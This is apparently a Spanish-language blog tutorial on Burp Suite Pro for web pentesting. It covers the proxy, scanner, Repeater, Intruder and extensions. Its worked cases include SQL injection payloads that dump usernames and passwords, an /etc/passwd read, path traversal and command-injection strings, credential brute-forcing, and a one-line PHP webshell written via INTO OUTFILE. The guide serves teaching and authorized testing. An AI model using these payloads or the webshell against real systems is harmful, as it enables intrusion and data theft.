Interfaz de Burp Suite Pro para pentesting web avanzado
Burp Suite Pro es la herramienta definitiva para el análisis y la explotación de vulnerabilidades en aplicaciones web modernas.
Junior Geeks·
Hacking y Pentesting
·16 Minutos de lectura

Burp Suite Pro: Guía Completa de Pentesting Web Avanzado

Domina Burp Suite Pro, la herramienta profesional de referencia para el pentesting de aplicaciones web. Guía completa: Proxy, Scanner, Intruder, Repeater, extensiones y casos prácticos de explotación de vulnerabilidades.

Tabla de Contenido

Burp Suite: La Navaja Suiza del Pentesting Web

Burp Suite es la herramienta de pruebas de intrusión web más utilizada por los profesionales de la ciberseguridad. Desarrollado por PortSwigger, este proxy interceptor permite analizar, manipular y explotar las vulnerabilidades de las aplicaciones web modernas. No entenderlo a fondo deja de ser una opción cuando tu objetivo es explotar vulnerabilidades de forma profesional.

Tanto si eres pentester, bug bounty hunter o desarrollador preocupado por la seguridad de tus aplicaciones, Burp Suite es un recurso indispensable.

En esta guía Burp Suite exhaustiva, aprenderás a dominar Burp Suite Pro y cómo usar Burp Suite para realizar auditorías de seguridad completas y descubrir vulnerabilidades antes que los atacantes.

Dashboard de Burp Suite Pro con resumen de escaneo
El Dashboard de Burp Suite Pro ofrece una vista centralizada de todas las operaciones de pentesting en curso.

¿Qué es Burp Suite?

Burp Suite es una plataforma integrada para pruebas de seguridad de aplicaciones web. Su función principal es actuar como un proxy interceptor entre el navegador y el servidor, permitiendo al analista de seguridad ver, modificar y reenviar el tráfico HTTP/HTTPS. Esto es fundamental para descubrir y explotar vulnerabilidades tanto de forma manual como automatizada.

Versiones de Burp Suite: Community vs Professional

  • Burp Suite Community Edition: Gratuita, con funcionalidades limitadas, ideal para iniciarse.
  • Burp Suite Professional: Aproximadamente $499/año en el sitio oficial (precio puede variar por región o impuestos); incluye escáner automático, herramientas manuales avanzadas, soporte y actualizaciones.
  • Burp Suite Enterprise: Para grandes organizaciones, con integración CI/CD y gestión centralizada.

Esta guía se centra en Burp Suite Professional, la versión utilizada por la mayoría de los pentesters.

¿Por Qué Usar Burp Suite en Pentesting Web?

  • Interceptar y modificar solicitudes: Prueba payloads maliciosos y elude controles del lado del cliente.
  • Escáner automático de vulnerabilidades: Detección de inyecciones SQL, XSS, SSRF, XXE, etc.
  • Fuzzing avanzado: Pruebas exhaustivas con Intruder (fuerza bruta, fuzzing de parámetros).
  • Repetir y analizar: Vuelve a enviar solicitudes para comprender el comportamiento de la aplicación.
  • Extensiones potentes: Logger++, Autorize, Turbo Intruder, JSON Web Tokens…
  • Soporte HTTPS/TLS: Descifrado y análisis del tráfico encriptado.

Cómo Configurar Burp Suite: Instalación y Proxy

Proceso de Descarga de Burp Suite

Dirígete a portswigger.net/burp/releases y descarga la versión correspondiente a tu sistema operativo (Windows, macOS, Linux).

Pasos para la Instalación

# Linux
chmod +x burpsuit_community_linux.sh
./burpsuit_community_linux.sh

# macOS
Abrir el .dmg y arrastrar Burp Suite a la carpeta Aplicaciones.

# Windows
Ejecutar el instalador .exe.

Configuración del Proxy: Navegador y FoxyProxy

Por defecto, Burp escucha en 127.0.0.1:8080. Debes configurar tu navegador para utilizar este proxy.

Opción 1: Usar el Navegador Integrado de Burp (Método recomendado)

Burp Suite incluye un navegador Chromium preconfigurado que ya confía en el certificado CA de Burp, lo que evita configuraciones manuales de certificados en tu navegador principal.

  • Ve a la pestaña Proxy > Intercept.
  • Haz clic en Open Browser.
  • Se abrirá una nueva ventana del navegador integrada que ya está conectada al proxy y con el certificado de Burp instalado de fábrica.

Opción 2: Extensión FoxyProxy (Control granular)

Si necesitas cambiar rápidamente entre diferentes proxies o trabajar desde tu navegador principal, FoxyProxy sigue siendo una opción sólida.

  • Instala FoxyProxy en Firefox o Chrome.
  • Crea un nuevo perfil para Burp: HTTP, 127.0.0.1, puerto 8080.
  • Actívalo con un clic solo cuando necesites interceptar tráfico.

Instalar el Certificado CA para Tráfico HTTPS

Para interceptar el tráfico HTTPS, debes instalar el certificado de Burp.

  1. Inicia Burp Suite.
  2. Configura tu proxy como se indicó anteriormente.
  3. En el navegador, visita: http://burpsuite.
  4. Haz clic en “CA Certificate” en la esquina superior derecha.
  5. Guarda el archivo cacert.der.
  6. Impórtalo en los certificados de tu navegador/sistema.
    • Firefox: Ajustes > Privacidad y seguridad > Certificados > Ver certificados > Importar.

Explorando la Interfaz de Burp Suite

  • Dashboard: Vista general de tu sesión: tareas activas, escaneo en curso, alertas de vulnerabilidades.
  • Target: Árbol de todos los sitios que has explorado. Permite definir el alcance (scope) de tus pruebas.
  • Proxy: El núcleo de Burp: intercepta y manipula las solicitudes HTTP/HTTPS en tiempo real.
  • Intruder: Herramienta de fuzzing y ataque automatizado (fuerza bruta, fuzzing de parámetros).
  • Repeater: Vuelve a enviar una solicitud manualmente modificando los parámetros para probar diferentes payloads.
  • Sequencer: Analiza la calidad de los tokens de sesión (entropía, predictibilidad).
  • Decoder: Codifica/decodifica datos (Base64, URL, HTML, hexadecimal, etc.).
  • Comparer: Compara dos solicitudes/respuestas para identificar las diferencias.
  • Scanner (Solo Pro): Escáner automático de vulnerabilidades: inyección SQL, XSS, SSRF, XXE, etc.
  • Burp Collaborator: Servicio que permite detectar vulnerabilidades fuera de banda (OAST), como blind XSS o SSRF silenciosos. Puedes usar el servidor público o tu propio servidor privado para capturar interacciones externas durante pruebas.
  • Extensions (Extender): Tienda de extensiones (BApp Store) para añadir funcionalidades adicionales.

Módulo Proxy: Interceptar y Manipular Solicitudes

Activar la intercepción

En la pestaña Proxy > Intercept, haz clic en “Intercept is on“.

Navega a un sitio web, y Burp interceptará automáticamente la solicitud antes de que llegue al servidor.

Historial de solicitudes HTTP en la pestaña Proxy de Burp Suite Pro
El historial HTTP te permite revisar y analizar cada petición enviada, incluso después de haber sido reenviada al servidor.

Analizar una solicitud HTTP

GET /api/user/123 HTTP/1.1
Host: example.com
Cookie: session=abc123def456
User-Agent: Mozilla/5.0
Accept: application/json

Puedes:

  • Forward: Enviar la solicitud tal como está.
  • Drop: Descartar la solicitud.
  • Modify: Cambiar los parámetros, cabeceras o cuerpo.
  • Action > Send to Repeater: Enviar a Repeater para pruebas manuales.
  • Action > Send to Intruder: Enviar a Intruder para fuzzing.

Caso Práctico: Eludir una Restricción Client-Side

Imagina un formulario que limita el precio máximo a 100 € mediante JavaScript del lado del cliente.

  1. Intercepta la solicitud POST con Burp.
  2. Modifica el parámetro price=100 a price=1.
  3. Haz clic en Forward para enviar la solicitud.
  4. Si el servidor no realiza la validación, pagarás 1 € en lugar de 100 € (¡vulnerabilidad!).

HTTP History

La pestaña Proxy > HTTP history muestra un historial completo de todas las solicitudes/respuestas.

Filtros útiles:

  • Mostrar solo las solicitudes dentro del scope.
  • Filtrar por método (GET, POST, PUT, DELETE).
  • Filtrar por código de estado (200, 302, 403, 500).
  • Buscar patrones (contraseñas, tokens, claves de API).

Módulo Scanner: Detección Automática (Solo Pro)

Iniciar un escaneo activo

  1. Haz clic derecho en una solicitud en HTTP History.
  2. Selecciona Scan > Active scan.
  3. Configura el alcance (URL específica o sitio completo).
  4. Inicia el escaneo.

El escáner probará automáticamente las principales vulnerabilidades web como:

  • Inyecciones SQL: ' OR 1=1--, UNION SELECT
  • XSS (Cross-Site Scripting): <script>alert(1)</script>
  • Path Traversal: ../../etc/passwd
  • SSRF (Server-Side Request Forgery)
  • XXE (XML External Entity)
  • Inyección de Comandos: ; ls -la
  • Open Redirect
  • Cabeceras de seguridad ausentes (CSP, HSTS, X-Frame-Options)

Escáner pasivo

El escáner pasivo analiza las solicitudes/respuestas sin enviar payloads maliciosos. Detecta:

  • Información sensible en las respuestas (emails, claves de API, tokens).
  • Cabeceras HTTP no seguras.
  • Cookies sin los flags Secure o HttpOnly.
  • Versiones de software obsoletas en los banners.

Interpretar los resultados

Visita la pestaña Dashboard > Issue activity o Target > Site map (iconos de colores).

Niveles de severidad:

  • High (rojo): Vulnerabilidad crítica (inyección SQL, RCE).
  • Medium (naranja): Riesgo moderado (XSS, CSRF).
  • Low (amarillo): Riesgo bajo (divulgación de información, cabeceras ausentes).
  • Information (azul): Sin riesgo directo, pero proporciona información útil.

El Scanner no es Mágico

El Scanner de Burp Pro es alucinante, pero como otras herramientas para escanear vulnerabilidades web, no es mágica. Su principal valor es encontrar vulnerabilidades de “fruta madura” (low-hanging fruit) y darte una dirección para tu investigación manual.

  • Genera Falsos Positivos: Reportará vulnerabilidades que en realidad no existen.
  • Omite Falsos Negativos: No encontrará vulnerabilidades complejas o de lógica de negocio que requieren un cerebro humano.

La regla de oro: Nunca copies y pegues un reporte del Scanner en un informe final. Cada hallazgo debe ser verificado y explotado manualmente en Repeater. Tu cerebro sigue siendo la herramienta principal; el Scanner es solo un asistente muy potente.

Módulo Repeater: Reenviar y Analizar Solicitudes

Uso de Repeater

  1. Haz clic derecho en una solicitud > Send to Repeater.
  2. Ve a la pestaña Repeater.
  3. Modifica la solicitud (parámetros, cabeceras, cuerpo).
  4. Haz clic en Send.
  5. Analiza la respuesta en el panel de la derecha.

Caso Práctico: Testeo Manual de Inyección SQL

URL: GET /product?id=5

Prueba los siguientes payloads SQL:

/product?id=5'
/product?id=5' OR 1=1--
/product?id=5' UNION SELECT NULL,NULL,NULL--
/product?id=5' AND SLEEP(5)--

Si el servidor responde de manera diferente (error SQL, contenido distinto, retraso), es potencialmente vulnerable.

Comparar varias solicitudes

Crea varias pestañas en Repeater para probar diferentes payloads y compara las respuestas.

Burp Suite Intruder: Fuzzing y Ataques Automatizados

Principios de Funcionamiento de Intruder

Intruder permite automatizar el envío de solicitudes con payloads variables para probar diferentes hipótesis: fuerza bruta, fuzzing de parámetros, enumeración, etc.

Configurando un ataque de fuerza bruta con Burp Suite Intruder en la pestaña Positions
Intruder permite definir puntos de inyección precisos (§§) para automatizar ataques de fuzzing o fuerza bruta.

Cómo Utilizar Intruder Paso a Paso

  1. Envía una solicitud a Intruder: Send to Intruder.
  2. Pestaña Intruder > Positions: Define los puntos de inyección con el símbolo §§.
  3. Pestaña Payloads: Elige tus payloads (lista, números, fuzzing).
  4. Pestaña Options: Configura los hilos, redirecciones, codificación.
  5. Haz clic en Start attack.

Tipos de Ataque en Intruder: Sniper, Cluster Bomb y Más

Tipo de AtaqueNº de PayloadsComportamientoCaso de Uso Típico
Sniper1Itera sobre una única lista de payloads en una posición.Fuzzing de un solo parámetro (ID, archivo, etc.).
Battering Ram1Usa el mismo payload simultáneamente en todas las posiciones marcadas.Probar si un mismo valor (ej. admin) es válido en múltiples campos.
PitchforkMúltiplesUsa dos o más listas de payloads. Coge el primer payload de la lista A y el primero de la B, luego el segundo de la A y el segundo de la B, etc.Probar credenciales donde se conoce la correspondencia (usuario1:pass1, usuario2:pass2).
Cluster BombMúltiplesPrueba cada combinación posible entre todas las listas de payloads.Fuerza bruta de credenciales (probar todos los usuarios con todas las contraseñas).

Caso práctico: Fuerza bruta de autenticación

Solicitud POST de inicio de sesión:

POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test123

Configuración de Intruder:

  • Tipo de ataque: Cluster bomb.
  • Posiciones: username=§admin§&password=§test123§.
  • Payload set 1 (username): lista de nombres de usuario (admin, root, user, etc.).
  • Payload set 2 (password): lista de contraseñas comunes.
  • Start attack.

Analiza las respuestas: un código 302 (redirección) indica éxito, mientras que un 401 indica fallo.

Fuzzing de Parámetros con Listas de Payloads

URL: GET /api/user?id=5

Lista de payloads: 1, 2, 3, -1, 0, 999, ' OR 1=1--, ../../../etc/passwd

Observa las diferencias en las respuestas (longitud, código, contenido) para identificar anomalías.

Extensiones Esenciales para Burp Suite Pro

Instalar extensiones

Ve a la pestaña Extender > BApp Store, explora las extensiones disponibles e instálalas con un solo clic. Muchas de ellas también se pueden encontrar en el repositorio de PortSwigger en GitHub.

Extensiones recomendadas

  1. Logger++
    Logger HTTP avanzado con filtros, exportación a CSV y búsqueda potente. Superior al historial por defecto.
  2. Autorize
    Prueba automáticamente controles de acceso rotos (IDOR, escalada de privilegios).
    Principio: Configura dos sesiones (usuario normal + admin). Autorize reenvía cada solicitud con ambas sesiones para detectar si un usuario puede acceder a recursos de administrador.
  3. Turbo Intruder
    Versión ultrarrápida de Intruder con soporte de Python para scripts personalizados. Ideal para fuzzing masivo.
  4. JSON Web Tokens (JWT)
    Decodifica y manipula tokens JWT. Prueba vulnerabilidades de JWT: alg:none, clave débil, etc.
  5. Param Miner
    Descubre parámetros ocultos no documentados probando variaciones de nombres comunes.
  6. Active Scan++
    Mejora el escáner nativo con verificaciones adicionales (CORS, cache poisoning, host header injection).
  7. Retire.js
    Detecta bibliotecas JavaScript obsoletas con vulnerabilidades conocidas.

Caso Práctico Completo: Explotación de SQLi

Escenario

Aplicación de comercio electrónico con búsqueda de productos: GET /search?q=laptop

Paso 1: Detección

Intercepta la solicitud con el Proxy y envíala a Repeater.

Prueba payloads SQL:

/search?q=laptop'
/search?q=laptop' OR 1=1--
/search?q=laptop' UNION SELECT NULL--

Si el servidor devuelve un error SQL o un comportamiento anómalo, es vulnerable.

Paso 2: Enumeración

Determina el número de columnas con UNION:

/search?q=laptop' UNION SELECT NULL--
/search?q=laptop' UNION SELECT NULL,NULL--
/search?q=laptop' UNION SELECT NULL,NULL,NULL--

Continúa hasta que no se produzca ningún error. Supongamos que hay 3 columnas.

Paso 3: Extracción de datos

Obtén la versión de la base de datos:

/search?q=laptop' UNION SELECT NULL,@@version,NULL--

Enumera las tablas:

/search?q=laptop' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--

Obtén los usuarios:

/search?q=laptop' UNION SELECT NULL,username,password FROM users--

Paso 4: Explotación avanzada (según el SGBD)

Lectura de archivos (MySQL):

/search?q=laptop' UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL--

Escritura de archivo (webshell):

/search?q=laptop' UNION SELECT NULL,'<?php system($_GET["cmd"]); ?>',NULL INTO OUTFILE '/var/www/html/shell.php'--

Buenas Prácticas y Ética en el Pentesting

Probar la seguridad de una aplicación sin una autorización explícita por escrito es ilegal en la mayoría de los países.

Casos de uso legítimos:

  • Auditar tus propias aplicaciones.
  • Misiones de pentesting con un contrato firmado y autorización escrita.
  • Programas de bug bounty en plataformas autorizadas (HackerOne, Bugcrowd, YesWeHack).
  • Entornos de formación (HackTheBox, TryHackMe, PortSwigger Academy).

Revista nuestro: TOP Sitios Web Vulnerables para Pruebas de Penetración

Casos ilegales:

  • Probar aplicaciones de terceros sin permiso.
  • Explotar vulnerabilidades descubiertas sin una divulgación responsable.
  • Utilizar Burp para el robo de datos o sabotaje.

Divulgación Responsable de Vulnerabilidades

Si encuentras una vulnerabilidad, es crucial saber qué hacer para reportarla correctamente.

  1. Contacta al propietario de forma privada.
  2. Otorga un plazo razonable para la corrección (30-90 días).
  3. No divulgues públicamente la información hasta después de la corrección o la expiración del plazo.
  4. Documenta tus hallazgos (prueba de concepto, impacto, recomendaciones).

Recursos Adicionales y Formación

Burp Suite Pro vs Community: ¿Cuál Elegir?

FuncionalidadBurp Suite Community Edition (Gratis)Burp Suite Pro (449 $/año)
Proxy HTTP/HTTPS
Repeater
Intruder (fuzzing)➖ Muy lento (throttled)✓ Rápido
Escáner automático
Extensiones✓ (BApp Store)
Guardar/Cargar proyectos
Soporte de Collaborator
Comparer

Veredicto: Si eres principiante o utilizas Burp ocasionalmente, la versión Community es suficiente. Para los profesionales (pentesting, bug bounty), la versión Pro es indispensable por su escáner automático y la velocidad de Intruder.

Dominar Burp Suite es Esencial para el Pentesting Web

Burp Suite es mucho más que un simple proxy: es una plataforma completa para auditar la seguridad de las aplicaciones web modernas. Al dominar sus herramientas (Proxy, Scanner, Repeater, Intruder) y explorar las extensiones, serás capaz de:

  • Identificar vulnerabilidades antes de que sean explotadas.
  • Comprender los mecanismos de ataque web (OWASP Top 10).
  • Automatizar pruebas de seguridad complejas.
  • Documentar y corregir fallos de manera profesional.

Practica en plataformas legales (PortSwigger Academy, HackTheBox), documenta tus descubrimientos y respeta siempre el marco legal.

Dominar el pentesting web con Burp Suite es una habilidad clave, pero la ciberseguridad es una responsabilidad, no un juego.

¡Feliz pentesting responsable!

Avertencia y cláusula de no responsabilidad

Este artículo se publica con fines puramente educativos e informativos.

El uso de Burp Suite o de cualquier otra herramienta de pruebas de intrusión en aplicaciones, sitios web o infraestructuras de las que no eres propietario o para las que no has recibido una autorización explícita por escrito está estrictamente prohibido y puede constituir un delito en muchos países.

El equipo de esgeeks.com y los autores de este artículo declinan toda responsabilidad por el uso abusivo, ilegal o malicioso de la información aquí contenida. Cualquier acción que emprendas con los conocimientos adquiridos aquí es de tu exclusiva responsabilidad.

Al aplicar las técnicas descritas en este artículo, aceptas actuar de manera ética, responsable y en estricto cumplimiento de las leyes vigentes.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda